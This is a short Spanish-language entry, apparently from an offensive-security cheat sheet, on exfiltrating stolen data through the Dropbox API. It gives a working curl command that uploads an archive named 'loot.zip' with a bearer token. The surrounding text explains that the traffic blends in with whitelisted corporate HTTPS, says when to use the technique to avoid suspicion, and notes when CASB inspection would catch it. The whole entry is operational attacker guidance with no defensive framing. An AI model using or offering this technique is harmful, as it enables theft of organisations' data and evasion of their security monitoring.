Exfil Dropbox

curl -X POST https://content.dropboxapi.com/2/files/upload -H "Authorization: Bearer <token>" --data-binary @loot.zip

Sube datos robados a Dropbox con la API y un token OAuth: el tráfico sale por HTTPS hacia un servicio legítimo de la whitelist.

Ejecútalo cuando el egress solo permite HTTPS a servicios conocidos y quieres sacar lotes medianos (GB) sin levantar sospechas: Dropbox, Google Drive y OneDrive están en casi todas las whitelists corporativas. La API es directa con curl y no requiere el cliente de escritorio.

Si el equipo azul usa CASB (Netskope, Zscaler) con inspección TLS de APIs cloud, la subida queda registrada con la IP de origen y el volumen. Tampoco si el volumen es enorme: la cuota de la cuenta limita el total.